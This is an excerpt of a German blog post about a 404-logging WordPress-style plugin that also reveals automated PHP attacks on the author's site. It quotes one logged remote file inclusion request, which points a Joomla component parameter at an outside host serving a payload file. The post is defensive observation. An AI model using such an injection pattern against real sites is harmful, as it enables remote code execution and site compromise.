Tag Archives: attacken

Sicherheitsrisiken einer Homepage durch automatisierte Angriffe

Derzeit habe ich ein Plugin laufen, welches mir jeden “Fehltritt” eines Besuchers speichert und ausgibt. Ursprünglich setzt es automatisch und manuell Weiterleitungen von nicht mehr existenten Seiten auf ausgewählte oder eben die richtige neue Seite.

Wenn dann ein Link ins leere läuft und einen 404-Error-Code erzeugt werden alle Informationen in eine Liste geschrieben. Schöner Nebeneffekt ist, dass ich aufgrund meiner Infrastruktur der Links auch gleichzeitig jeden versuchten PHP-Angriff sehe.

Das Ganze sieht dann in etwa so aus:

http://www.webregard.de/components/ com_mp3_allopass/allopass.php?osConfig_live_site= http://$$$$$$.com.cn/zhuanti/dkp/02.txt?

Ich habe mir mal die Mühe gemacht und die ganzen Attacken via SQL zusammenzufassen und auszugeben, dabei kommen folgende Ergebnisse raus welche eine schöne Übersicht gibt: Continue reading